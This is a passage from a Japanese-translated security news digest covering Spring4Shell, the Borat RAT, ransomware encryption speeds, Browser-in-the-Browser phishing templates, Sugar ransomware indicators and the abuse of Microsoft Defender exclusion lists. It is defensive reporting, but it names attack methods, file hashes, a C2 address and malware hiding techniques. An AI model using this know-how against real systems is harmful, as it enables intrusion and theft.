SKU (【訳注】ストックキーピングユニット(Stock keeping Unit)の略。在庫管理上の最小の品目数を数える単位を表す。噛み砕いていうと、全く同じ商品としてお客様にお渡しできるものをSKUと言う(物流現場通信より))、商品番号、特定の文字数まで(約85文字)の他のセットのような単純な一行文字列を保持する能力を持ったものである。対して、2Dバーコードは、データ保持能力、様々なタイプのデータ保持能力、その中に組み込まれている様々なエラーチェックと修正メカニズムで遥かに広範な用途がある。
 名前が現しているように、2Dバーコードは複数の次元を持ち、一行(一次元)だけでなく、マトリックス全体に渡ってデータを格納できる。QRコード マトリックスの各部分は、特別な意味と役割があり、コンテンツを保持するセクションはマトリックス全体の一部に過ぎない。
 2Dバーコードのエラーチェックと修正の側面は、QRコードの一部が切り取られたり破損している場合でさえ、そのQRコードは正しくスキャンされ、その内部に格納されているコンテンツを保持している可能性があるという意味において重要である。試してみよう。
 これは一次元バーコードには当て嵌まらない。一次元バーコードは、スキャナが隣り合った直線バーの幅の比率を計算することによって機能する。そこで、一次元バーコードの一部を隠したり破壊したりすると、正しくスキャンすることができない場合がある。
 しかし、まさしくQRコードに組み込まれているエラー修正メカニズムは、バーコード作成者が創造性を発揮することを可能にしている。マトリックスの小さな部分に機能的なコンテンツ(URLやもう一つのデータのような)をパックしたり、それ以外のマトリックスの部分は芸術的な画像を提供できる空白のキャンバスとして機能させることができる。
 これは、上に示したような芸術的バーコードや最初に示した豹のQRコードGIFが、正しくスキャンできる可能性を説明している。つまり、機能データ(URL)を含んでいるQRコードの領域はマトリックス全体のごく一部である。
 上の豹のQRコードGIFの場合、豹が動いている周囲のピクセル(QRコードの領域)は、相対的に静的である。これは、(アニメーションが再生されている中央ではなく)コンテンツが存在している可能性のある場所である。
 しかし、Freedmanによって共有されたGIFで発生していることは多少複雑に見える。GIFの各フレームは、ピクセルを再配置することでQRコードをほぼ完全に変更している。
 画像認識に精通した人のために、Twitterユーザであり技術ブロガーであるBenBEが、あなたに代わって答えを持っているかもしれない。
BenBEのTweet 
 
 バズった”Never Gonna Give You Up” QRコード中の全ての小さな正方形に関して、スキャナは、その正方形(全体で3✕3、もしくは、9ピクセルで構成される)の中央だけを確認する。即ち、バーコードのコンテンツ部分(YouTubeのURL)はこれらのピクセル中に格納されている。残りのピクセルは空白のキャンバスとして提供されアニメーションに使用されている。
 「ディザリング」とそれが提供する多くの可能性についての詳細を読みたい人々は、
2年前のYCombinatorHackerNewsスレッド への再訪に心が動くかもしれない。
 ここでは、
QRPicture ジェネレータについて説明する。ソースコードは
GitHub で入手できる。
 このジェネレータを使用すると、可能な限り実際の写真のように見え、完全に機能するQRコードを作成し、好みに合わせてアニメーション化することもできる。
訳者より、アニメーションQRコードについて学問的知見を求めたいのであれば、
こちら(「最適化アルゴリズムを用いたアニメーションQRコードの作成」鹿児島大学 工学部 情報工学科、小野 智司、森永 健介、中山 茂、芸術科学会論文誌 Vol. 8, No. 1, pp. 25 – 34) を参照してください。
Spring4Shell(CVE-2022-22965): 詳細と緩和策
 
 Kaspersky : SecureList(2022/04/04) 
 先週、研究者はSpring(オープンソースJavaフレームワーク)中に緊急の脆弱性 CVE-2022-22965 を発見した。この脆弱性を使用して、攻撃者はリモートWebサーバ上で任意のコードを実行できる。これは、Springフレームワークの人気を考えると、 CVE-2022-22965を緊急の脅威にした。
悪名高いLog4Shellの脅威 と類似していることから、この脆弱性は Spring4Shellと名付けられた。
CVE-2022-22965とCVE-2022-22963: 技術的詳細 
 CVE-2022-22965 (Spring4Shell, SpringShell)は、HTTPリクエスト中に格納されているデータをアプリケーションによって使用される特定のオブジェクトにバインディングするためのデータバインディング機能を使用するSpring Framework中の脆弱性である。このバグは getCachedIntrospectionResultsメソッド中に存在している。これは、HTTPリクエストを介してクラス名を渡すことで、そのようなオブジェクトに対する不正アクセスを取得するために使用される。これは、特別なオブジェクト クラスが使用されると、データリークやリモートコード実行のリスクを生成する。この脆弱性は、ずっと前に終わった CVE-2010-1622に類似している。そこで、その名前が classLoaderやprotectionDomainに一致しないようにクラス名チェックが修正として追加された。しかしながら、JDKの新しいバージョンでは、例えば、 Java 9 Platform Module System機能を介して、このような脆弱性攻撃が行える代替方法が存在している。
 攻撃者は、Tomcat(【訳注】Webサーバー上で実行されるJavaのプログラムであるJavaサーブレットを動かすときに必要なソフト(A-Starより))ログ出力設定を上書きし、次に、このフレームワークの脆弱性バージョンを稼働しているサーバ上で任意のコマンドを実行するためにJSP Web Shellをアップロードすることができる。
脆弱な設定は以下で構成されている
Spring脆弱性攻撃に対する緩和策 
 CVE-2022-22965は、2.6.6で修正された。詳細は 
the Spring blog for details 参照。
 CVE-2022-22963を修正するには、新しい Spring Cloud Functionのバージョンをインストールする必要がある。
VMware website for details 参照
 脆弱性攻撃を検出するには、 必ずAdvanced Exploit PreventionとNetwork Attack Blocker機能を有効にする。脆弱性攻撃中に使用されるテクニックの一部は、我々が検出した他の脆弱性攻撃中に見ることができる。これがVerdict名が異なる理由である。
改竄の兆候
Verdicts 
PDM:Exploit.Win32.Generic
UMIDS:Intrusion.Generic.Agent.gen
Intrusion.Generic.CVE-*.*
脆弱性攻撃のMD5ハッシュ 
7e46801dd171bb5bf1771df1239d760c – shell.jsp (CVE-2022-22965)
3de4e174c2c8612aebb3adef10027679 – exploit.py (CVE-2022-22965)
新しいBoratリモートアクセス マルウェアが大変なことに 
 BleepingComputer : News>Security(2022/04/03) 
 Boratと名付けられた新たなリモートアクセス トロイがダークネット マーケット(【訳注】暗号マーケットとも呼ばれる。TorやI2Pなどのダークネットを介して運営されるダークウェブ上の商業ウェブサイト。主に合法商品の販売に加えて、ドラッグ、サイバー兵器、武器、偽造通貨、盗難クレジットカード情報、偽造文書、無許可の医薬品、ステロイドなどの違法商品の販売または仲介取引を行うブラックマーケットとして機能する(Wikipediaより))に現れた。Boratは、簡単で使い易いDDoS攻撃の実行、UAC(【訳注】User Account Control、Windowsのセキュリティ機能の一つで、管理者権限を持つユーザーに普段は一般ユーザーと同じ権限しか与えず、管理者権限の必要な処理を実行しようとした際に画面に警告ダイアログを表示して本当に実行してよいか確認する機能(e-Wordより))のバイパス、身代金要求型マルウェアの配備を提供している。
 RATとして、Boratはリモートの脅威のアクターが犠牲者のマウスやキーボードを制御し、ファイル、ネットワークポイントにアクセスし、彼らの存在のあらゆる兆候を隠蔽することを可能にしている。
 このマルウェアは、そのオペレータが彼らのコンパイル オプションを選択することを可能にしているので、高度で注文仕立てされた攻撃に必要で正確に機能する小さなペイロードを作成することを可能にしている。
 Boratは、オンライン上のBoratに焦点を当て、その機能を明らかにする技術研究用のマルウェアを採取した
Cyble の研究者によって解析された。
多くの機能 
 Borat RATがサイバー犯罪者の間で販売されているのか、無料で共有されているのかは定かでないが、Cybleは、ビルダー、そのマルウェア モジュール、サーバー証明書を含んだパッケージの形式で提供されていると発言している。
このトロイの機能は、夫々、専用のモジュールを持っており以下を含んでいる。
・ Keylogging  ー 押したキーを監視し記録し、それらをテキストファイルに保存する・ Ransomware  ー 犠牲者のマシンに身代金要求型マルウェアを配備し、Broatを介して自動的に脅迫文を生成する・ DDoS  ー セキュリティ侵害したマシンのリソースを使用してターゲットのサーバにガーベッジ トラフィックを送信する・ Audio recording  ー 利用可能であれば、マイクロフォンを通して音声を記録し、wabファイルに保存する。・ Webcam recording  ー 利用可能であれば、Webカメラからビデオをレコーディングする・ Remote desktop  ー 非表示でリモートデスクトップを起動し、ファイル操作、インプット デバイスの使用、コードの実行、アプリケーションの起動等を実行する・ Reverse proxy  ー (【訳注】リバースプロキシとは、特定のサーバの代理として、そのサーバへの外部からのすべての接続を中継するプロキシサーバ。当該サーバへアクセスしようとするクライアントはすべてリバースプロキシを経由するよう誘導される(e-Wordより))リモートオペレータが身元の漏洩を防御するためにリバースプロキシをセットアップする・ Device info  ー 基本的なシステム情報を入手する・ Process hollowing  ー 正当なプロセス中にマルウェアコードを挿入して検出を回避する・ Credential stealing  ー ChromiumベースのWebブラウザに格納されているアカウント認証を盗む・ Discord token stealing  ー 犠牲者からDiscord(【訳注】アメリカ発のボイスチャット サービス)のトークンを盗む・ 他の機能  ー 音声の再生、マウスボタンの交換、デスクトップの非表示、タスクバーの非表示、マウスが動かなくなる、モニターのオフ、空白画面の表示、システムのハングアップによって、犠牲者を混乱させる
 
 
 Cybleの分析で指摘されているように、上述の機能によりBoratは本質的にRAT、スパイウェア、身代金要求型マルウェアになるため、デバイス上で様々な悪意ある行動を実行する可能性のある強力な脅威である。
 全体として、RATの開発者は、Sacha Baron Cohenによって具現化されたコメディ映画Boratの主人公に因んで名前を付けていたとしても、このマルウェアは冗談では済まされない。
 Bleeping Computerは、このマルウェアの素性を発見しようとして深く掘り下げ、実行されるペイロードが最近
同定されたAsyncRAT であったことを発見した。この作成者はAsyncRATに基づいて作業を行った可能性がある。
 一般的に、脅威のアクターは、実行可能ファイルやゲームやアプリケーションのクラックを装ったファイルを介してこれらのツールを拡散させている。トレント(torrent)や胡散臭いサイトのような信頼できないソースから如何なるものもダウンロードしないよう注意しなさい。
10の悪名高い身代金要求型マルウェアの暗号化スピードテストが実施された 
 BleepingComputer : News>Security(2022/03/23) 
 研究者たちは、10の身代金要求型マルウェアの変種がファイルを暗号化する速度をテストし、それらの攻撃に対してタイムリーに対応することがどのように実行できるのかを評価する技術的な実験を行った。
 身代金要求型マルウェアは、セキュリティ侵害したマシン上のファイルやディレクトリを列挙し、効果的な暗号化のターゲットを選択し、そのデータを暗号化するマルウェアである。そこで、対応する復号キーなしでは、これらのファイルは利用できなくなる。
 これで、データの所有者はファイルにアクセスできなくなる。そこで身代金要求型マルウェア攻撃は、データの破壊や運用の中断、あるいは、復号キーと引き換えに身代金の支払いを要求する金銭的な恐喝のどちらかを実行する。
 デバイスを如何に早く暗号化するかは重要なことである。検出が早ければ早いほどダメージはより少なく、復元に必要なデータ量は最小となる。
身代金要求型マルウェアをテストする 
 Splunkの研究者達は、400の暗号化テストを実行した。このテストは、10の異なるマルウェアファミリーから、ファミリーあたり10サンプルを採用し、パフォーマンス仕様の異なる4つの異なるホストプロファイルで構成されている。
 「我々は、Windows 10とWindows Server 2019からなる4つの異なる『生贄』プロファイルを作成した。夫々のプロファイルは、顧客の環境からベンチマークされた2つの異なるパフォーマンス仕様が付属している」と、「次に、10の異なる身代金要求型マルウェアファミリーとこれらのファミリー毎にテスト用の10のサンプルを選択した」と、Splunkは彼らの
レポート の中で説明している。
 これらのテストの間、研究者達は、様々なツール(Windows logging, Windows Perfmon statistics, Microsoft 
Sysmon , 
Zeek , 
stoQ のような)を使用して98,561ファイル(トータル 53GB)に対する暗号化速度を評価した。
 ホストシステムは、実際の企業ネットワーク設定を反映するように変更された。解析者は、全ての暗号化時間を計測し、各変種が暗号化するための中央値を導いた。
 テスト装置上にある10の異なる身代金要求型マルウェア株の全100種のサンプルの中央値は42分52秒であった。
 しかしながら、以下の表に見られるように、身代金要求型マルウェアのサンプルの一部は、明らかにこの中央値から乖離している。
 「勝者」、応答タイムマージンにおいて致死的な株はLockBitであり、平均5分50秒で達成している。最も高速なLockBitの変種は、1分間に25,000ファイル暗号化した。
 LockBitは、アフィリエイト プロモーションのページで、30を超える様々な身代金要求型マルウェア株に対する独自のベンチマークをリリースし、ファイルを暗号化する最速の身代金要求型マルウェアであると長い間自慢してきた。
 かつて多くの変種を生み出したAvaddonは、平均13分余りで達成し、REvilは、約24分でファイルを暗号化し、BlackMatterとDarksideは、45分で暗号化を完了した。
 遅い方では、Contiが54GBのテストデータの暗号化にほぼ1時間を要し、MazeとPYSAはほぼ2時間を要している。
時間要素 
 時間は重要なファクターであるが、身代金要求型マルウェア攻撃における唯一の検出機会ではない。一般的には、偵察期間、横展開、認証の窃取、特権の昇格、データ漏洩、シャドーコピーの無効化などが含まれる。
 暗号化が終了した後、攻撃がどれくらい長持ちするのかや、管理の容易さを決定するのは暗号化スキーム自体の強度なので、強度はスピードより重要である。
 身代金要求型マルウェアが最終的に配備された時の応答時間の短さは、特定の検出と緩和の機会に焦点を当てることが非現実的であり、最終的には誤りであることを強調している。
 Splunkのレポートに記されているように、この研究は、組織が重大事案の対応から身代金要求型マルウェア感染の防止に焦点をシフトする必要があることを示している。
 セキュリティ侵害の検出に平均3日かかるとする今までの研究を考慮すると、全体の中央値である43分は、ネットワーク防御側が身代金要求型マルウェアの活動を検出するためのチッポケな手段にすぎない。
 殆どの身代金要求型マルウェア グループは、ITチームが人員不足になっている週末に攻撃してくる。殆どの暗号化の企ては、成功裏に完了する。暗号化の時間は防衛側にとって重要な考慮のファクターではない。
 最終的に、最善の防衛は、身代金要求型マルウェアが配備される前の偵察段階で通常ではない活動を検出することである。
 これには、疑わしいネットワーク活動、通常ではないアカウント活動を探し、攻撃の前に一般的に使用されるツール(Cobalt Strike, ADFind, Mimikatz, PsExec, Metasploit, Rclone)の検出を含んでいる。
新しいフィッシング ツールキットは誰もがインチキのChromeブラウザ ウィンドウの作成を可能にしている 
 BleepingComputer : News>Security(2022/03/19) 
 レッドチーム(【訳注】 ある組織の効率性を改善するように挑む独立したグループで、対象組織に敵対した役割あるいは視点を持つことを前提とする(Wikipedia))のメンバーやインチキのChromeブラウザ ウィンドウを使用して効果的なシングル サイン オンのフィッシィング ログイン フォームを作成したい野心的なサイバー犯罪者に作成することを可能にするフィッシングキットがリリースされた。
 Webサイトにサインインするとき、Google, Microsoft, Apple, Twitter, あるいはSteamでさえ、認証オプションが表示されることが一般的である。
 例えば、DropBoxのログイン フォームは、以下に示すようにAppleやGoogleアカウントを使用してログインすることが可能になっている。
 GoogleやAppleのボタンでログインをクリックすると、シングル サイン オン(SSO)ブラウザ ウィンドウが表示され、あなたの認証情報を入力してアカウントでログインするように促される。
 これらのウィンドウは、ログインフォームと、ログインフォームのURLを表示するアドレスバーだけを表示するようになっている。
 このアドレスバーは、これらのSSOウィンドウで無効にされているが、表示されたURLを使用して正当なgoogle.comドメインが、サイトへのサインインに使用されていることを確認することができる。このURLは更に、フォームの信頼性を追加し、あなたに快くログイン認証を入力させるようにしている。
 驚異のアクターは、過去にもHTML, CSS, JavaScriptを使用してインチキのSSOウィンドウを作成することを企てているが、通常そのウィンドウには少し疑いをもたせるものが存在している。
ブラウザ攻撃へのブラウザの導入 
 これは、新しい"Browser in the Browser Attack"(【訳注】GoogleやMicrosoftのようなサイトの小さなブラウザウィンドウを真似ることでログイン認証を盗む方法(The Registerより))が、フィッシング攻撃に使用することのできるカスタム アドレスURL、タイトルを含むインチキではあるがリアルなChromeポップアップ ウィンドウを作成するために予め作られているテンプレートの使用が役に立つ場所である。
 基本的に、この攻撃は説得力のあるフィッシング攻撃を作成するために、実際のブラウザウィンドウにインチキのブラウザウィンドウを作成する(Browser in the Browser)。
 このBrowser in the Browser攻撃テンプレートは、
セキュリティ研究者mr.d0xによって作成された 。そして、彼は
GitHub 上にこのテンプレートをリリースした。これらのテンプレートは、Windows用のGoogle ChromeとMac用があり、ダークモードとライトモードのバリエーションを含んでいる。
 mr.d0xは、このテンプレートは大変簡単なので、あらゆるオンライン プラットフォーム用のシングル サインオンのログインフォームを表示するための説得力のあるChromeウィンドウの作成に使用することができるとBleepingComputerに告げている。
 この研究者は、レッドチームのメンバーが、このテンプレートを単純にダウンロードし、それらを希望するURLとWindowsタイトルを含めるように編集し、iframeを使用してログインフォームを表示することができていると発言している。
 また、直接ログインフォーム用のHTMLをこのテンプレートに追加することも可能であるが、mr.d0xは、使用しているCSSとHTMLを適切にこのフォームと提携させる必要があるとBleepingComputerに告げている。
 
Evilginx フィッシィングツールキットの作成者である
Kuba Gretzky は、この新しい方法をテストし、Evilginxプラットフォームで完璧に動作する方法を示している。これは、フィッシング攻撃中に二要素認証キーを盗むように改造することができることを意味している。
この件に関するKuba GretzkyのTweetは、こちら。
 。
 mr.d0xは、これは新しいテクニックではなく、Steam認証を盗むために2020年にインチキのゲームサイトによって使用されたもので、
Zscalerによって報告されている と、BleepingComputerに告げている。
この件に関するTheAppleFreakのTweetは、こちら。
 
 しかしながら、現在インチキのChromeウィンドウ用の予め作成されたテンプレートは利用可能であり、レッドチームのメンバーは、彼らの顧客や彼らの所有する企業の従業員の防衛力をテストするために説得力のあるフィッシング サインイン フォームを作成するために、このテンプレートを使用することができる。
 この新しいBrowser in the Browserフィッシング攻撃を試したい人々のために、
 GitHubからこのテンプレート を入手することができる。
TargetCompany身代金要求型マルウェアの犠牲者用の無料の復号ツールがリリースされた 
 BleepingComputer : News>Security(2022/02/07) 
 チェコのサイバーセキュリティ ソフトウェア企業Avastが、TargetCompany身代金要求型マルウェアの犠牲者のファイルを無料で復号する復号ユーティリティをリリースした。
 しかしながら、Avastは、この復号ツールは「特定の環境の下」で暗号化されたファイルを復元するためにのみ使用することができると警告している。
 この復号ツールを使用してファイルを復元したい犠牲者は、このツールがリソースを消費し時間のかかるプロセスになる可能性があることに注意する必要がある。
 「パスワードをクラッキングしている間、利用可能な全てのプロセッサのコアは、殆どの演算能力を復号パスワードを発見するために消費する。このクラッキング プロセスは10時間以上の膨大な時間がかかるかもしれない」と「この復号ツールは、定期的に進捗を保存する。これを中断させ、後でこの復号ツールを再起動させた場合は、以前開始されたクラッキング プロセスを復活させるオプションを提供してくる」と
Avastは発言 している。
 TargetCompany身代金要求型マルウェア復号ツールは、暗号化されたファイルとオリジナルの暗号化されていないファイルとを比較した後、パスパードをクラックすることによって機能する。
 Avastによると、これはTargetCompany身代金要求型マルウェアによって暗号化されたデバイス毎に一回実行する必要があり、この復号ウィザードは"I know the password for decrypting files"を選択することによって今までにクラックされた暗号化パスワードの入力を可能にする。
 TargetCompany身代金要求型マルウェアの犠牲者は、Avastサーバからこの復号ツール(
64-bit もしくは、
32-bit )をダウンロードし、この復号ツールのユーザインターフェイス中に表示されている指示を使用してディスクパーティション全体を復号することができる。
 「このウィザードの最後のページで、暗号化されたファイルをバックアップするか否かを決定することができる。これらのバックアップは、復号プロセス中に何らかの不都合が発生した場合に役に立つ可能性がある」と「このオプションはDefaultでONになっている。これは我々も推奨していることである。'Decrypt'をクリックすると、復号プロセスが開始される。復号ツールが作業しているので、終了するまで待ちなさい」と、Avastは追加している。
 AvastのTargetcompany身代金要求型マルウェア復号ツールの使用方法に関する更なる指示は、
こちら で見つけることができる。
 
Targetcompany は、比較的新しく発見された身代金要求型マルウェア株であり、
2021年06月中旬以来活動 している。このマルウェアは、暗号化されたファイルに .mallox, .exploit, .architek, .brg拡張子を追加する。
 また、このマルウェアは暗号化したファイルのある全てのフォルダに"HOW TO RECOVER !!.TXT"と名付けた脅迫文を投下する。
 これは、ボリューム シャドウ コピーを削除し、ブート オプションを再構成し、機密情報のデータベース(例えば、MySQL, Oracle, SQL Server)をロックする可能性のあるプロセスをKillした後に発生する。
 Avastは、2021年10月に、
Babuk , 
AtomSilo , 
LockFile 身代金要求型マルウェアに関して、犠牲者が身代金を支払うことなくファイルの復元を可能にする無料の復号ツールをリリースしている。
注目される新しいSugar身代金要求型マルウェアの低い身代金要求額 
 BleepingComputer : News>Security(2022/02/04) 
 新たなSugar身代金要求型マルウェア作戦は、企業ネットワークよりはむしろ積極的に個人のコンピュータを低い身代金額で攻撃している。
 Walmart Security Teamによって最初に発見された'Sugar'は、新しいRansomware-as-a-Service (RaaS)であり、2021年11月に始まり、徐々にスピードアップしてきている。
 この身代金要求型マルウェアの名前は、Walmartによって発見されたこの作戦のアフィリエイト サイト 'sugarpanel[.]space'に由来する。
 このニュースに関して、貴方方が読んできた殆どの身代金要求型マルウェアと異なり、Sugarは企業ネットワークをターゲットにしておらず個人のデバイス、おそらくコンシューマ(【訳注】在宅ビジネスを含む、自宅で使用するために製品を購入する顧客(Microsoft用語集より))や中小企業をターゲットにしているようである。
 この身代金要求型マルウェアが、どのように拡散し、あるいは犠牲者に感染しているのか明らかではない。
Sugar身代金要求型マルウェア 
 起動すると、Sugar身代金要求型マルウェアは、そのデバイスのIPアドレスと地理的場所を取得するために whatismyipaddress.com と ip2location.com に接続する。
 次に、http://cdn2546713.cdnmegafiles[.]com/data23072021_1.datから76MBのファイルをダウンロードして続行するが、このファイルがどのように使用されるのかは不明である。
 最後に、この身代金要求型マルウェア作戦のコマンドアンドコントロールサーバに、この攻撃に関連するデータを送受信する場所である179.43.160.195に接続する。この身代金要求型マルウェアは、実行時にコマンドアンドコントロールサーバにコールバックし続ける、おそらく攻撃の状況からRaaSをアップデートするために。
 ファイルを暗号化する時、この身代金要求型マルウェアは、以下のフォルダ中にリストされているファイルや以下のファイル名を持つものを除く全てのファイルを暗号化する。
除外されるフォルダ:
 \windows\
除外されるファイル:
 BOOTNXT
 
 Walmartの研究者は、この身代金要求型マルウェアは
SCOP暗号化アルゴリズム を使用してファイルを暗号化していると
発言している 。この暗号化されたファイルは、そのファイル名に .encoded01 拡張子を持っている。
 この身代金要求型マルウェアは、そのコンピュータ上でスキャンされたファイルの各フォルダにBackFiles_encoded01.txtと名付けた脅迫文もまた作成する。
 この脅迫文は、犠牲者のファイルに発生したことに関する情報、一意のID、身代金の支払い方法に関する情報のあるTorサイトへのリンクを含んでいる。このTorサイトは、chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onionである。
 Torサイトに訪問すると、犠牲者は身代金を送信するためのビットコインのアドレス、チャットセクション、無料で5ファイルを復号するための機能を含む犠牲者独自のページが表示される。
 この作戦の身代金額は非常に低い。BleepingComputerによって確認された攻撃でのキーを受け取るための要求額は、数百ドルであった。不思議なことに、我々のテストボックスでの結果として得られた要求額は、僅か0.00009921ビットコイン($4.01=462.05円、本日15:22時点の換算)
 BleepingComputerは少数のファイルを持つ仮想マシンでこの身代金要求型マルウェアをテストしたので、この身代金要求型マルウェアは暗号化したファイルの数に基づいて身代金額を生成していることを示している可能性がある。
 殆どの身代金要求型マルウェア感染とは異なり、このマルウェア実行ファイルは、暗号化を終了した後でさえ起動する。しかしながら、自動起動設定は作成されていない。そして、新しいドキュメントの暗号化の継続はしないようである。
 この時点で、この身代金要求型マルウェアが無料で復号を可能にする何らかの弱点を持っているか否かは不明である。さらなる情報が利用可能になれば、この記事はアップデートされる。
 更に、この身代金要求型マルウェアに感染した場合は、どのように感染したのかを我々に知らされたい。
Microsoft: Windowsは確実なアップデートをするには少なくとも8時間を必要とする 
 BleepingComputer : News>Security(2022/01/29) 
 Windowsアップデートを介してアップデートがリリースされた後、Windowsデバイスが最新のアップデートを取得し、間違いなくインストールするには少なくとも8時間オンライン上に存在していることが必要であると、Microsoftは発言している。
 Windowsを実行しているデバイスに電源が入り、Windowsアップデートに接続されている総時間は'Update Connectivity'としてMicrosfotによって追跡されている。
 この測定値は、システムの接続時間の不足と、システムがアップデートされていない理由を相互に関連付けているので、一部のデバイスが、最近リリースされたアップデートを正常に取得できない理由であることの解りやすい説明となっている。
 David Guyer(MEM(【訳注】Microsoft Endpoint Manager、すべてのエンドポイントを管理するための単一の統合エンドポイント管理プラットフォーム(Microsoftより))のWindows Updatesに関するMicrosoft Program Manager)によると、Windows Deviceが最新のアップデートを取得し、成功裏にインストールするには少なくともオンライン上に8時間を必要とする。
 「我々の調査で最も影響力のあることの一つは、QualityとFeatureのアップデートが正常にインストールできるようになるにはデバイスの電源をONにし、そして、Windows Updateに接続している必要時間であった」と「我々が発見したことは、接続時間が必要時間に満たないデバイスは、正常にアップデートされそうもない。具体的には、データは、デバイスが確実に更新されるためには、最低2時間の継続的な接続とアップデートがリリースされた後、合計6時間の接続を必要としていることを示している」と、更に「これは、正常なダウンロードとバックグラウンド インストレーションを可能にするので、デバイスがアクティブであり、接続されている限り、再起動もしくはレジューム(【訳注】コンピュータの実行状態を保存して停止させ、次に使用するとき即座に停止直前の状態に復帰する機能(e-Wordより))することができる」とGuyerは発言している。
 Guyerはまた、アップデートをダウンロードし適切にインストールするには、デバイスは電源ONのまま一晩中Internetに接続していたほうがいいと発言している。
 デバイス > モニター に移動して、Featureアップデートの失敗もしくは、Windows Expeditedアップデート失敗レポートの何れかを選択することによってMicrosoft Intuneを介してUpdate Connectivityが十分でないデバイスを追跡することができる。
 Update Connectivity不十分警告は、Reports > Windows updates > Reports > Windows Expedited update report に進みIntune中のSummaryレポートを介して発見することもできる。
 完全にアップデートされず、最小接続要求未満のWindows 10デバイスを検証した時、Microsoftは以下のように理解していた:
・ Windows 10のビルドをサービスされないデバイスの凡そ50%は、最小Update Connectivity計測値を満たしていない。 
 「アップデートの問題をトラブルシューティングするとき、十分なUpdate Connectivityを持つデバイスを選択することが最善であることが分かった」と「デバイスのUpdate Connectivityが不十分な場合、他の更新の問題の調査は複雑になる。これは、不十分なUpdate Connectivityが、新しい問題を作成することが理由である。この新しい問題は十分な接続が確立されると解消される」と、Guyerは
付け加えている 。
 関連するニュースに於いて、Microsoftは、'Update Stack Package'と呼ばれる、
Windows Update改善のためのよりスマートな配信方法 のテストを開始した。これは、Windowsの月例もしくはFeatureのアップデートに先立ち、メジャーなOSアップデートを除くアップデート エクスペリエンスを改善するだろう。
 Microsoftはまた、Windows 11の累積アップデートをWindows 10コンピュータより凡そ40%小さくすることで、セキュリティとQualityアップデートをより高速にアップデートすることができるように
再設計 している。
 昨年、MicrosoftはWindows Updateを管理するための新しいAPIをリリースした。これは、開発者やITプロフェッショナルが、エンタープライズ環境で
迅速なWindows10 セキュリティ アップデート を有効にするものである。
Windows Defenderの弱点はハッカーにマルウェアの検出をバイパスさせることを可能にしている 
 BleepingComputer : News>Security(2022/01/13) 
 脅威のアクターは、Windows上のMicrosoft Defenderアンチウィルスの欠点(このアンチウィルスがスキャンしていないロケーションがあることを学習)を悪用し、そこにマルウェアを植え付けている。
 一部のユーザによると、この問題は少なくとも8年間続いており、Windows 10 21H1とWindows 10 21H2に影響を与える。
緩いパーミッシヨン 
 他のあらゆるアンチウィルス同様に、Microsoft Defenderは、マルウェアのスキャンから除外されるシステム上の場所(ローカルやネットワーク)を追加することをユーザに許可している。
 人々は一般的に、正当なアプリケーションの機能がマルウェアとして誤検出され、その機能に影響が及ぶことを防ぐために除外設定を実行している。
 スキャン除外リストはユーザによって異なるが、システム上の攻撃者にとって有用な情報である。このスキャン除外リストは、検出される恐れなしに悪意あるファイルを格納できる場所を攻撃者に与えている。
 セキュリティ研究者は、Microsoft Defenderのスキャンから除外される場所のリストが保護されておらず、あらゆるローカルユーザが、このファイルにアクセスできることを発見した。
 無頓着なパーミッションで、ローカルユーザはレジストリを検索したり、Microsoft Defenderがマルウェアもしくは危険なファイルのチェックを許されていないパスを認識することができる。
 Antonio Cocomazzi(
RemotePotato0 脆弱性に関するレポートで有名なSentinelOneの脅威研究者)は、この情報が保護されていないと指摘し、機密として考慮されるべきものであり、“reg query”コマンドを実行すると、Microsoft Defenderがスキャンしないように命令されている全てのもの(ファイル、フォルダ、拡張子、プロセス)が明らかになると
指摘 している。
 他のセキュリティエキスパート
Nathan McNulty は、この問題はWindows 10のバージョン21H1と21H2に存在するが、Windows 11には影響を与えないことを確認している。
 McNultyはまた、誰もがGroup Policy設定を格納しているエントリのあるレジストリツリーから、除外リストを入手できることも確認している。この情報は、複数のコンピュータに関して除外を提供しているときには、より機密性が高くなる。
 Microsoftスタックの保護に精通したセキュリティアーキテクトであるMcNultyは、サーバー上のMicrosoft Defenderには「特定の役割または機能がインストールされたときに有効になる自動除外」があり、これらはカスタム ロケーションをカバーしていないと
警告 している。
 脅威のアクターは、Microsoft Defenderの除外リストを取得するためにローカルアクセスを必要とするが、これはハードルと言うには程遠い。多くの攻撃者は既にセキュリティ侵害したた企業ネットワークに存在しており、可能な限りステルスに横方向に移動する方法を探している。
 Microsoft Defenderの除外リストを知ることによって、Windowsマシンを既にセキュリティ侵害している脅威のアクターは、検知される恐れなしに除外されているフォルダにマルウェアを格納し実行することができる。
 Bleeping Computerが実行したテストでは、除外フォルダから実行されたマルウェアは、Windowsシステムですいすいと稼働し、Microsoft Defenderからの警告を発生させなかった。
 我々がConti身代金要求型マルウェアのサンプルを使用し、これを通常のロケーションから実行すると、Microsoft Defenderは、効力を生じこのマルウェアをブロックした。
 Conti身代金要求型マルウェアを除外フォルダに配置した後、このマルウェアを実行すると、Microsoft Defenderは如何なる警告も表示せず、如何なるアクションも取らず、このマルウェアがマシンを暗号化することを許した。
 このMicrosoft Defenderの欠点は新しいものではなく、過去にPaul Boltonによって公にされている。
  或る上級セキュリティコンサルタントは、彼らは、
およそ8年前にこの問題に気づき 、マルウェア開発者にこれを提供する利点を認識していたと発言している。
 「もしも私がマルウェア開発者だったなら、Windows Defenderの除外を検索し、間違いなく私のペイロードを除外フォルダにドロップするか、ドロップするペイロードに除外されているファイル名と同じ、もしくは拡張子と同じ名前を付けるように常に自分自身に言い聞かせる - Aura」
 
 この長きに渡り、Microsoftがこの問題を未だに解決していないので、ネットワーク管理者は、グループポリシーを介して
サーバー と
ローカルマシン でMicrosoft Defenderの除外を適切に構成するためのドキュメントを参照する必要がある。
Windowsの新しいKB5009543, KB5009566アップデートはL2TP VPN接続を破壊する 
 BleepingComputer : News>Security(2022/01/12) 
 Windows 10のユーザと管理者が、最近のWinodows 10用のKB5009543とWindows 11用のKB5009566累積アップデートをインストールした後に、L2TP VPN(【訳注】「L2TP」と「IPsec」の2つのプロトコルを併用したVPN接続方式。モバイル端末(スマートフォン、PCなど)から、インターネット経由で企業などのプライベートネットワークへ安全に通信(リモートアクセス)できる仕組み(YAMAHAより))接続に問題が発生したと報告している。
 昨日、Microsoftは、
2022年1月の定例パッチ の一部としてセキュリティ上の脆弱性とバグを修正するWindows Updateをリリースした。
 これらのアップデートは、Windows 11用の
KB5009566 と、Windows 10 2004/20H1/21H1用の
KB5009543 を含んでいる。
アップデートはL2TP接続を破壊する 
